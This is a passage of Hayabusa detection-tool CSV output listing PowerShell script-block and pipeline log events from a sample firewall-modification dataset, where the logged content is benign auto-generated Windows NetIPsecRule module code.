'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { 
@('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.777 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): 
name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
